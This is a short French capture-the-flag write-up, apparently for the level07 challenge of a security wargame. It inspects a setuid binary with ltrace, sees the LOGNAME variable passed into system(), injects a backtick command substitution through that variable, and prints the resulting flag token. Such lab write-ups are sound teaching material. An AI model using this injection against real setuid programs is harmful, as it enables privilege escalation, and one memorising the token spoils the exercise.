Level07 :

on se connecte avec le flag06

on se place dans le home : cd 

on inspecte l'ensemble des dossiers et fichiers et leur droits : ls -la

on peut voir un fichier executable : level07

quand on l'execute il renvoie : "level07"

on utilise la commande ltrace pour inspecter le programme : ltrace ./level07

—> 	__libc_start_main(0x8048514, 1, 0xbffff7c4, 0x80485b0, 0x8048620 <unfinished ...>
	getegid()                                              = 2007
	geteuid()                                              = 2007
	setresgid(2007, 2007, 2007, 0xb7e5ee55, 0xb7fed280)    = 0
	setresuid(2007, 2007, 2007, 0xb7e5ee55, 0xb7fed280)    = 0
	getenv("LOGNAME")                                      = "level07"
	asprintf(0xbffff714, 0x8048688, 0xbfffff47, 0xb7e5ee55, 0xb7fed280) = 18
	system("/bin/echo level07 "level07
	 <unfinished ...>
	--- SIGCHLD (Child exited) ---
	<... system resumed> )                                 = 0
	+++ exited (status 0) +++



si on affiche la variable LOGNAME : echo $LOGNAME
on obtient : "level07"

on change la valeur de cette dernière par getflag : export LOGNAME='`getflag`'

on relance l'executable : ./level07
on obtient le flag
—> Check flag.Here is your token : fiumuikeil55xe9cu4dood66h
